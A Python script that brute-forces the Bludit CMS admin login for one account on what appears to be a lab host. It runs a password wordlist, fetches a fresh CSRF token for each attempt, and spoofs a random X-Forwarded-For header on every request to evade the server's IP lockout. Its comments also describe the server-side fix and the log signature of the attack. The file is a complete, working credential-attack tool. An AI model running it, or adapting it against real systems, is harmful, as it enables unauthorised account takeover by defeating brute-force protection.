import requests
import re
import random

# Address of the host whose /admin/ login is exercised (10.0.0.0/8 is
# private address space).
HOST = "10.10.10.191"

# Account name the login attempts are made against.
USER = "fergus"

# Plain-HTTP requests that pass ``proxies=PROXY`` are routed through a
# proxy listening on the local machine, port 8080.
PROXY = {
    "http": "http://127.0.0.1:8080",
}

def initialize_session():
    """Fetch the admin page and return ``(csrf_token, session_cookie)``.

    The token is read from the hidden ``tokenCSRF`` input in the returned
    HTML; the cookie is the ``BLUDIT-KEY`` value set on the same response.
    This request is sent directly and does not go through ``PROXY``.

    Raises:
        AttributeError: if the hidden input is not present in the page,
            because the regex match is then ``None``.
    """
    response = requests.get(f'http://{HOST}/admin/')
    token_match = re.search(
        r'<input type="hidden" id="jstokenCSRF" name="tokenCSRF" value="([a-f0-9]*)"',
        response.text,
    )
    # A fresh token/cookie pair is issued per call; the pair must be sent
    # back together on the login POST.
    return token_match.group(1), response.cookies.get('BLUDIT-KEY')

def do_login(user, password):
    """Submit one login attempt for *user* / *password* and print the outcome.

    A new CSRF token and session cookie are fetched for every attempt, and
    the POST is sent through ``PROXY`` without following redirects so that
    ``check_answer`` can inspect the raw status code. Returns ``None``.

    Every attempt carries a freshly randomised ``X-FORWARDED-FOR`` value.
    NOTE(review): presumably this is aimed at the "has been blocked"
    lockout that ``check_answer`` looks for. A lockout keyed on this
    client-supplied header rather than on the connection's peer address
    treats each attempt as a new client. On the server side, forwarding
    headers should only be honoured when they come from a trusted reverse
    proxy. In logs, this pattern shows up as many login POSTs from one
    peer address, each claiming a different forwarded address.
    """
    csrf, cookie = initialize_session()

    # randint() includes its upper bound, so an octet of 256 can appear;
    # that is not a valid IPv4 octet and is itself a usable log signal.
    octets = [random.randint(1, 256) for _ in range(4)]
    forwarded_for = '.'.join(str(octet) for octet in octets)

    form = {
        'tokenCSRF': csrf,
        'username': user,
        'password': password,
        'save': '',
    }
    response = requests.post(
        f'http://{HOST}/admin/login',
        data=form,
        proxies=PROXY,
        cookies={'BLUDIT-KEY': cookie},
        allow_redirects=False,
        headers={'X-FORWARDED-FOR': forwarded_for},
    )
    check_answer(response, user, password)


def check_answer(requestFILE, USERNAME, PASSWORD):
    """Classify a login response and print the result.

    Args:
        requestFILE: response object exposing ``status_code`` and ``text``.
        USERNAME: account name that was submitted.
        PASSWORD: password that was submitted.

    Returns:
        ``True`` for a 301 response (treated as a successful login),
        ``False`` for a 200 response whose body reports a wrong password
        or a blocked client, and ``None`` for anything else.
    """
    status = requestFILE.status_code

    # The caller disables redirect following, so a 301 is seen as-is.
    if status == 301:
        print("USERNAME AND PASSWORD FOUND!")
        print(f"{USERNAME}:{PASSWORD}")
        return True

    if status != 200:
        return None

    body = requestFILE.text
    if "Username or password incorrect" in body:
        print("WRONG PASSWORD!")
        return False
    if "has been blocked" in body:
        # The server-side lockout has triggered for this client.
        print("BLOCKED BY IP")
        return False
    return None
        

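# Read the candidate list up front. The context manager closes the file
# handle as soon as the lines are in memory; the original left it open.
with open('potenPASS.txt') as wordlist_file:
    wordlist = wordlist_file.readlines()

# One login attempt per line, against the account named in USER (the
# module-level constant, instead of a repeated string literal).
for line in wordlist:
    # Drop the trailing newline and any surrounding whitespace.
    line = line.strip()

    do_login(USER, line)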
